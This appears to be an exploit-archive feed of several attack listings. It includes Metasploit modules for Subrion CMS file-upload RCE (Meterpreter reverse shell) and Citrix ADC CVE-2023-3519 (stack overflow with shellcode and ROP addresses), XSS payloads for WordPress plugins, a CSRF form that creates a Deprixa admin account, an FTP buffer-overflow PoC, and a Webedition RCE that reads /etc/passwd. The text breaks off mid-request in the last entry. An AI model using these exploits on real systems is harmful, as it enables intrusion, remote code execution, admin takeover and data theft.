<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::PhpEXE<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',<br /> 'Description' => %q{<br /> This module exploits an authenticated file upload vulnerability in<br /> Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by<br /> the .htaccess file not preventing the execution of .pht, .phar, and<br /> .xhtml files. Files with these extensions are not included in the<br /> .htaccess blacklist, hence these files can be uploaded and executed<br /> to achieve remote code execution. In this module, a .phar file with<br /> a randomized name is uploaded and executed to receive a Meterpreter<br /> session on the target, then deletes itself afterwards.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Hexife', # Original discovery, PoC, and CVE submission<br /> 'Fellipe Oliveira', # ExploitDB author<br /> 'Ismail E. Dawoodjee' # Metasploit module author<br /> ],<br /> 'References' => [<br /> [ 'EDB', '49876' ],<br /> [ 'CVE', '2018-19422' ],<br /> [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],<br /> [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],<br /> [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]<br /> ],<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2018-11-04',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(80, true, 'Subrion CMS default port'),<br /> OptString.new('TARGETURI', [ true, 'Base path', '/' ]),<br /> OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),<br /> OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash<br /> print_status("Checking target web server for a response at: #{full_uri(uri)}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri<br /> })<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check request.')<br /> end<br /><br /> unless res.code == 200 && res.body.downcase.include?('subrion')<br /> return CheckCode::Unknown('Target is not running Subrion CMS.')<br /> end<br /><br /> print_good('Target is running Subrion CMS.')<br /><br /> # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br><br /> print_status('Checking Subrion CMS version...')<br /> version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first<br /><br /> unless version_number<br /> return CheckCode::Detected('Subrion CMS version cannot be determined.')<br /> end<br /><br /> print_good("Target is running Subrion CMS Version #{version_number}.")<br /><br /> if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')<br /> return CheckCode::Appears(<br /> 'However, this version check does not guarantee that the target is vulnerable, ' \<br /> 'since a fix for the vulnerability can easily be applied by a web admin.'<br /> )<br /> end<br /><br /> return CheckCode::Safe<br /> end<br /><br /> def login_and_get_csrf_token(username, password)<br /> print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')<br /><br /> # Session cookies need to be kept to preserve the CSRF token across multiple requests<br /> uri = normalize_uri(target_uri.path, 'panel/')<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'keep_cookies' => true<br /> })<br /><br /> unless res && res.code == 200<br /> fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")<br /> end<br /><br /> # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi"><br /> %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body<br /> fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?<br /><br /> print_good("Successfully obtained CSRF token: #{csrf_token}")<br /><br /> print_status(<br /> "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \<br /> "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"<br /> )<br /> auth = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> '__st' => csrf_token,<br /> 'username' => username,<br /> 'password' => password<br /> }<br /> })<br /><br /> unless auth && auth.code == 200<br /> fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")<br /> end<br /><br /> %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body<br /> unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')<br /> fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")<br /> end<br /><br /> print_good('Successfully logged in as Administrator.')<br /> return csrf_token<br /> end<br /><br /> def upload_and_execute_payload(csrf_token)<br /> print_status('Preparing payload...')<br /><br /> # set `unlink_self: true` to delete the file after execution<br /> payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"<br /> php_payload = get_write_exec_payload(unlink_self: true)<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')<br /> data.add_part('upload', nil, nil, 'form-data; name="cmd"')<br /> data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')<br /> data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')<br /> data.add_part(<br /> "#{php_payload}\n",<br /> 'application/octet-stream',<br /> nil,<br /> "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""<br /> )<br /> data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')<br /><br /> print_status('Sending POST data...')<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'data' => data.to_s<br /> })<br /><br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")<br /> end<br /> payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)<br /><br /> print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")<br /><br /> # This execution request returns nil<br /> print_status("Executing '#{payload_name}'... This file will be deleted after execution.")<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => payload_uri,<br /> 'keep_cookies' => true<br /> })<br /><br /> print_good("Successfully executed payload: #{full_uri(payload_uri)}")<br /> end<br /><br /> def exploit<br /> csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])<br /> upload_and_execute_payload(csrf_token)<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = NormalRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',<br /> 'Description' => %q{<br /> A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer<br /> overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in<br /> remote code execution as root.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes', # Analysis and module<br /> 'Douglass McKee', # Analysis and module<br /> 'Spencer McIntyre', # Just the module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-3519'],<br /> ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],<br /> ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']<br /> ],<br /> 'DisclosureDate' => '2023-07-18',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Payload' => {<br /> # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']<br /> 'Space' => 2048,<br /> 'DisableNops' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Citrix ADC 13.1-48.47',<br /> {<br /> 'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid<br /> 'fixup_rsp_adjustment' => 0x13a8,<br /> 'popen' => 0x01da6340,<br /> 'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp<br /> 'return_offset' => 168<br /> },<br /> ],<br /> [<br /> 'Citrix ADC 13.1-37.38',<br /> {<br /> 'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid<br /> 'fixup_rsp_adjustment' => 0x13a8,<br /> 'popen' => 0x01d7e320,<br /> 'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback<br /> 'return_offset' => 168<br /> },<br /> ],<br /> [<br /> 'Citrix ADC 13.0-91.12',<br /> {<br /> 'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid<br /> 'fixup_rsp_adjustment' => 0x12e0,<br /> # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit<br /> # clobbers it, the value needs to be restored<br /> 'fixup_rbp_adjustment' => 0x190,<br /> 'popen' => 0x01f42ec0,<br /> 'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic<br /> 'return_offset' => 168<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'WfsDelay' => 10<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')<br /> })<br /><br /> return CheckCode::Unknown if res.nil?<br /><br /> return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/<br /><br /> CheckCode::Detected<br /> end<br /><br /> def exploit<br /> shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string<br /> call loc_popen_arg1<br /> ; add this to the path for python payloads<br /> db "export PATH=/var/python/bin:$PATH;"<br /> db "#{Rex::Text.to_hex(payload.encoded)}", 0<br /> loc_popen_arg1:<br /> pop rdi<br /><br /> call loc_popen_arg2<br /> db "r", 0<br /> loc_popen_arg2:<br /> pop rsi<br /><br /> mov rax, <%= target['popen'] %><br /> sub rsp, 0x200<br /> call rax<br /><br /> loc_return:<br /> xor rax, rax<br /> add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %><br /> <% if target['fixup_rbp_adjustment'] %><br /> mov rbp, rsp<br /> add rbp, <%= target['fixup_rbp_adjustment'] %><br /> <% end %><br /> push <%= target['fixup_return'] %><br /> ret<br /> SHELLCODE<br /><br /> buffer = rand_text_alphanumeric(target['return_offset'])<br /> buffer << [target['return']].pack('Q')<br /> buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join<br /><br /> send_request_cgi({<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),<br /> 'encode_params' => false, # we'll encode them ourselves<br /> 'vars_get' => {<br /> 'event' => 'start',<br /> 'target' => buffer<br /> }<br /> })<br /> end<br /><br /> class Template<br /> def self.render(template, context = nil)<br /> case context<br /> when Hash<br /> b = binding<br /> locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }<br /> b.eval(locals.join)<br /> when NilClass<br /> b = binding<br /> else<br /> raise ArgumentError<br /> end<br /><br /> b.eval(Erubi::Engine.new(template).src)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: adivaha - Travel Tech Company<br /># Vendor Homepage: https://www.adivaha.com/<br /># Software Link: https://wordpress.org/plugins/adiaha-hotel/<br /># Demo: https://www.adivaha.com/demo/adivaha-online/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /mobile-app/v3/<br /><br />GET parameter 'isMobile' is vulnerable to XSS<br /><br />https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]<br /><br /><br />XSS Payload: clq95"><script>alert(1)</script>lb1ra<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2023-08-04<br /># Vendor Homepage: https://www.xlightftpd.com/<br /># Software Link : https://www.xlightftpd.com/download/setup.exe<br /># Tested Version: 3.9.3.6<br /># Vulnerability Type: Buffer Overflow Local<br /># Tested on OS: Windows XP Professional SP3 - Windows 11 x64<br /><br /># Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and Xlight FTP Server<br /># 2. - Run the python script and it will create exploit.txt file.<br /># 3. - Open Xlight FTP Server 3.9.3.6<br /># 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup <br /># 6. - Execute a Program after use logged in- Paste the characters <br /># 7 - Crashed<br /><br />#!/usr/bin/env python3<br /><br />exploit = 'A' * 294<br /><br />try: <br /> with open("exploit.txt","w") as file:<br /> file.write(exploit)<br /> print("POC is created")<br />except:<br /> print("POC not created")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access<br /># Date: 03.08.2023<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: https://www.myeventon.com/<br /># Version: 4.4<br /># Tested on: Google and Firefox latest version<br /># CVE : CVE-2023-2796<br /><br /># 1. Description<br />The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.<br /><br /><br /># 2. Proof of Concept (PoC)<br />Proof of Concept:<br />https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)<br /># Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt<br /># Date: 2023-07-27<br /># Exploit Author: Mehran Seifalinia<br /># Vendor Homepage: https://ninjaforms.com/<br /># Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip<br /># Version: 3.6.25<br /># Tested on: Windows 10<br /># CVE: CVE-2023-37979<br /><br />from requests import get<br />from sys import argv<br />from os import getcwd<br />import webbrowser<br />from time import sleep<br /><br /><br /># Values:<br />url = argv[-1]<br />if url[-1] == "/":<br /> url = url.rstrip("/")<br /><br /># Constants<br />CVE_NAME = "CVE-2023-37979"<br />VULNERABLE_VERSION = "3.6.25"<br /><br /> # HTML template<br />HTML_TEMPLATE = f"""<!DOCTYPE html><br /><!-- Created By Mehran Seifalinia --><br /><html><br /><head><br /> <title>{CVE_NAME}</title><br /> <style><br /> body {{<br /> font-family: Arial, sans-serif;<br /> background-color: #f7f7f7;<br /> color: #333;<br /> margin: 0;<br /> padding: 0;<br /> }}<br /> header {{<br /> background-color: #4CAF50;<br /> padding: 10px;<br /> text-align: center;<br /> color: white;<br /> font-size: 24px;<br /> }}<br /> .cool-button {{<br /> background-color: #007bff;<br /> color: white;<br /> padding: 10px 20px;<br /> border: none;<br /> cursor: pointer;<br /> font-size: 16px;<br /> border-radius: 4px;<br /> }}<br /> .cool-button:hover {{<br /> background-color: #0056b3;<br /> }}<br /> </style><br /></head><br /><body><br /> <header><br /> Ninja-forms reflected XSS ({CVE_NAME})</br><br /> Created by Mehran Seifalinia<br /> </header><br /> <div style="padding: 20px;"><br /> <form action="{url}/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="nf_batch_process" /><br /> <input type="hidden" name="batch_type" value="import_form_template" /><br /> <input type="hidden" name="security" value="e29f2d8dca" /><br /> <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" /><br /> <input type="hidden" name="method_override" value="_respond" /><br /> <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" /><br /> <input type="submit" class="cool-button" value="Click here to Execute XSS" /><br /> </form><br /> </div><br /> <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div><br /> <footer><br /> <a href="https://github.com/Mehran-Seifalinia">Github</a><br /> </br><br /> <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a<br /> </footer><br /></body><br /></html><br />"""<br /><br />def exploit():<br /> with open(f"{CVE_NAME}.html", "w") as poc:<br /> poc.write(HTML_TEMPLATE)<br /> print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")<br /> print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")<br /> sleep(2)<br /> webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")<br /><br /># Check if the vulnerable version is installed<br />def check_CVE():<br /> try:<br /> response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")<br /> if response.status_code != 200 or not("Ninja Forms" in response.text):<br /> print("[!] Ninja-forms plugin has not installed on this site.")<br /> return False<br /> else:<br /> version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]<br /> main_version = int(version.split(".")[0])<br /> partial_version = int(version.split(".")[1])<br /> final_version = int(version.split(".")[2])<br /> if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):<br /> print(f"[*] Vulnerable Nonja-forms version {version} detected!")<br /> return True<br /> else:<br /> print(f"[!] Nonja-forms version {version} is not vulnerable!")<br /> return False<br /> except Exception as error:<br /> print(f"[!] Error: {error}")<br /> exit()<br /><br /># Check syntax of the script<br />def check_script():<br /> usage = f"""<br />Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]<br /><br /> OPTIONS:<br /> --exploit: Open a browser and execute the vulnerability.<br /> TARGET:<br /> An URL starts with 'http://' or 'https://'<br /><br />Examples:<br /> > {argv[0].split("/")[-1]} https://vulnsite.com<br /> > {argv[0].split("/")[-1]} --exploit https://vulnsite.com<br />"""<br /> try:<br /> if len(argv) < 2 or len(argv) > 3:<br /> print("[!] Syntax error...")<br /> print(usage)<br /> exit()<br /> elif not url.startswith(tuple(["http://", "https://"])):<br /> print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")<br /> exit()<br /> else:<br /> for arg in argv:<br /> if arg == argv[0]:<br /> print("[*]Starting the script >>>")<br /> state = check_CVE()<br /> if state == False:<br /> exit()<br /> elif arg.lower() == "--exploit":<br /> exploit()<br /> elif arg == url:<br /> continue<br /> else:<br /> print(f"[!] What the heck is '{arg}' in the command?")<br /> except Exception as error:<br /> print(f"[!] Error: {error}")<br /> exit()<br /><br />if __name__ == "__main__":<br /> check_script()<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COURIER DEPRIXA V2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 5.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /deprixa/settings/addusersadmin/agregar.php<br /><br />[+] save code as poc.html <br /><br />[+] <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4><br /> </div><br /> <div class="modal-body"><br /> <!--Cuerpo del modal aquí el formulario--><br /> <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php" class="form-horizontal" method="post"><br /> <div class="form-group " id="gnombrepa"><br /> <label for="off_name" class="col-sm-2 control-label">Name</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" name="name_parson" placeholder="Name Administrator "><br /> </div><br /> </div><br /> <div class="form-group" id="gapellido"><br /> <label for="email" class="col-sm-2 control-label">Email </label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control email" name="email" placeholder="Email "><br /> </div><br /> <div class="col-sm-5"><br /> <input class="form-control phone" name="phone" placeholder="Phone"> <br /> </div><br /> </div><br /> <div class="form-group" id="gemail"><br /> <label for="office" class="col-sm-2 control-label">Office</label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control office" name="office" placeholder="Office "><br /> </div><br /> <div class="col-sm-5"><br /> <select type="text" class="form-control role" name="role" ><br /> <option value="Administrator">Administrator</option> <br /> </select><br /> </div><br /> </div><br /> <div class="form-group " id="gnombre"><br /> <label for="off_name" class="col-sm-2 control-label">User</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" name="name" placeholder="User"><br /> </div><br /> </div><br /> <div class="form-group" id="gpassword"><br /> <label for="pwd" class="col-sm-2 control-label">Password</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control pwd" name="pwd" placeholder="Password"><br /> </div><br /> </div><br /> <div class="form-group"><br /> <div class="col-sm-offset-2 col-sm-10"><br /> <div class="checkbox checkbox-success"><br /> <input id="checkbox3" type="checkbox" name="estado" value="1" checked><br /> <label for="checkbox3"><br /> Status<br /> </label><br /> </div><br /> <div class="checkbox checkbox-inline" ><br /> <input type="checkbox" name="type" value="a" onclick="return false" checked><br /> <label for="inlineCheckbox3"> Type of user </label><br /> </div><br /> </div><br /> </div><br /> <!--Fin del cuerpo del modal--><br /> </div><br /> <div class="modal-footer"><br /> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i><br /> Close</button><br /> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"><br /> </div><br /> </form> <br /> </div><br /> </div><br /> </div><br /> <!--fin de mo<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS<br />Application: Webedition CMS<br />Version: v2.9.8.8 <br />Bugs: Stored Xss<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date of found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps<br />1. Login to account<br />2. Go to New -> Media -> Image<br />3. Upload malicious svg file <br />svg file content:<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br /><br /><br />Poc request:<br /><br />POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1<br />Host: localhost<br />Content-Length: 761<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300<br />Connection: close<br /><br />we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1<br /><br /></code></pre>
<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)<br />Application: webedition Cms<br />Version: v2.9.8.8 <br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date of found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps<br />1. Login account<br />2. Go to New -> Webedition page -> empty page<br />3. Select php<br />4. Set as "><?php echo system("cat /etc/passwd");?> Description area<br /><br />Poc request: <br /><br />POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1<br />Host: localhost<br />Content-Length: 1621<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300<br />Connection: close<br /><br 